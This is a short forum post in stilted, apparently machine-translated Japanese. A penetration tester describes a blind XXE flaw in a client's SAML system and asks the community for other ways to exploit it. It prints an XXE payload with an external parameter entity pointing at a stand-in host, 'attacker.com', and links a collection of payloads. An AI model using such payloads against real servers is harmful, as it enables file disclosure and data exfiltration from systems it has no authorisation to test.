XXEの代替攻撃パス
そのため、クライアントエンゲージメント中にSAMLインフラストラクチャに対するブラインドXml外部エンティティ(XXE)攻撃を見つけましたが、それは以前にそれを悪用しようとする力を私に与えています。簡単なXXEを作成できます。
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/">%xxe;
]>
<xml></xml>
そして、私は彼らのサーバーからhttp接続を取得しますが、DTDを私からフェッチして実行するなどのより複雑なものは何も取得しません。 DTDのフェッチを確認できますが、DTD要求(サーバーへの単純なコールバック)が実行されません。ですから、3日間壁に頭をぶつけた後、コミュニティにXXEの巧妙なトリックや攻撃が制限されているときに攻撃経路があるかどうか尋ねるつもりでした。
この分野のすべてのことと同様に、より多くの研究が決して害を及ぼすことはありません!
私はここで見つかったペイロードを試しました https://Gist.github.com/staaldraad/01415b990939494879b4 元々は機能しませんでしたが、実装では実際に有効なxmlタグが必要であることを理解しました持っていない!